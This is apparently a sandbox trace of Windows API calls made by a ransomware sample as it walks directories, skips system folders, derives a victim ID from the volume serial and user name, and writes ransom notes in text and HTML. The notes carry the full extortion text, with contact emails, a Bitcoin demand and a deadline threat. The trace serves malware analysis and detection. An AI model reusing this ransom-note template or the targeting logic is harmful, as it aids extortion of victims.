	[0176.290] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.291] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="programdata") returned 0x0
	[0176.291] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0176.291] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0176.291] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x829a60ad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0176.291] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0176.336] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82959d4e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82959d4e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x829a60ad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0176.336] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82959d4e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82959d4e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82959d4e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0176.336] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x63dc6bf9, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63dc6bf9, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1
	[0176.336] lstrcmpW (lpString1="Windows", lpString2="..") returned 1
	[0176.336] lstrcmpW (lpString1="Windows", lpString2=".") returned 1
	[0176.336] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications"
	[0176.336] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\"
	[0176.337] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\", lpString2="Windows" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows"
	[0176.337] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows"
	[0176.337] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\"
	[0176.337] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\"
	[0176.337] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\*.*"
	[0176.337] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\*.*" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x63dc6bf9, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63dc6bf9, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9370
	[0176.343] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\*.*") returned 65
	[0176.343] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.344] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\*.*", cchLength=0x41 | out: lpsz="c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\*.*") returned 0x41
	[0176.344] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.344] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\*.*", lpSrch="windows") returned="windows\\*.*"
	[0176.344] FindClose (in: hFindFile=0xfb9370 | out: hFindFile=0xfb9370) returned 1
	[0176.347] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows"
	[0176.347] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\*.*"
	[0176.347] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.347] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.347] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\HELP_DECRYPT_YOUR_FILES.TXT") returned 89
	[0176.347] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0176.351] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0176.351] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0176.355] CloseHandle (hObject=0x39c) returned 1
	[0176.355] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.356] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0176.357] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0176.357] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0176.357] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0176.358] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0176.358] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0176.358] CloseHandle (hObject=0x39c) returned 1
	[0176.358] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.359] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.359] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0176.359] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\HELP_DECRYPT_YOUR_FILES.HTML") returned 90
	[0176.359] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0176.360] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0176.360] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0176.363] CloseHandle (hObject=0x39c) returned 1
	[0176.363] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.363] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.364] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.364] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0176.365] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.365] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0176.365] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0176.365] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.365] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0176.366] CloseHandle (hObject=0x39c) returned 1
	[0176.366] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\*.*" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x63dc6bf9, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x82a64e7d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb92b0
	[0176.366] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\*.*") returned 65
	[0176.366] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.366] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\*.*", cchLength=0x41 | out: lpsz="c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\*.*") returned 0x41
	[0176.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\*.*", lpSrch="windows") returned="windows\\*.*"
	[0176.367] FindClose (in: hFindFile=0xfb92b0 | out: hFindFile=0xfb92b0) returned 1
	[0176.367] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x63dc6bf9, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63dc6bf9, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0
	[0176.367] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0176.367] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0176.368] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x828c1428, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x828c1428, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x828e7429, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0176.368] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8289b4fc, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8289b4fc, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x828c1428, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0176.368] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3847afbf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1
	[0176.368] lstrcmpW (lpString1="Temp", lpString2="..") returned 1
	[0176.368] lstrcmpW (lpString1="Temp", lpString2=".") returned 1
	[0176.368] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data"
	[0176.368] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\"
	[0176.369] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\", lpString2="Temp" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp"
	[0176.369] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp"
	[0176.369] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\"
	[0176.369] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\"
	[0176.369] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*"
	[0176.369] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6407587b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0176.370] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*") returned 49
	[0176.370] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.370] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*", cchLength=0x31 | out: lpsz="c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*") returned 0x31
	[0176.370] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.370] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*", lpSrch="windows") returned 0x0
	[0176.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.371] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*", lpSrch="boot") returned 0x0
	[0176.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.371] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*", lpSrch="system volume information") returned 0x0
	[0176.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.371] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.372] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*", lpSrch="temp") returned="temp\\*.*"
	[0176.372] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0176.372] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp"
	[0176.372] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*"
	[0176.372] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.372] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.372] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\HELP_DECRYPT_YOUR_FILES.TXT") returned 73
	[0176.373] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\temp\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.414] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0176.414] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0176.419] CloseHandle (hObject=0x390) returned 1
	[0176.419] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
